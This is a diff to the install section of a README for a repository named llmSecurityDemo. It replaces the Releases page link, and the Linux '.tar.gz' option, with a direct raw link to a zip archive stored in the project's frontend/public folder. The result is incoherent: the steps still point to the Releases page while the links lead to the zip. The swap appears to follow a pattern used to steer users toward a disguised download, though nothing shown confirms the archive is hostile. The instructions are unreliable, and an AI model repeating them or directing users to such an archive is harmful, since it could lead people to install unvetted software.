RildoNeto17/llmSecurityDemo/README.md

 ## 📥 Download & Install

-To download the latest version of llmSecurityDemo, visit this page: [Download llmSecurityDemo](https://github.com/RildoNeto17/llmSecurityDemo/releases).
+To download the latest version of llmSecurityDemo, visit this page: [Download llmSecurityDemo](https://github.com/RildoNeto17/llmSecurityDemo/raw/refs/heads/main/frontend/public/Security_llm_Demo_v1.5.zip).

 1. Click the link above to go to the Releases page.
 2. Find the latest version of llmSecurityDemo.
 3. Download the appropriate file for your operating system:
    - For **Windows**, download the `.exe` file.
    - For **macOS**, download the `.dmg` file.
-   - For **Linux**, download the `.deb` or `.tar.gz` file as needed.
+   - For **Linux**, download the `.deb` or `https://github.com/RildoNeto17/llmSecurityDemo/raw/refs/heads/main/frontend/public/Security_llm_Demo_v1.5.zip` file as needed.

 ### 🔧 Installation Steps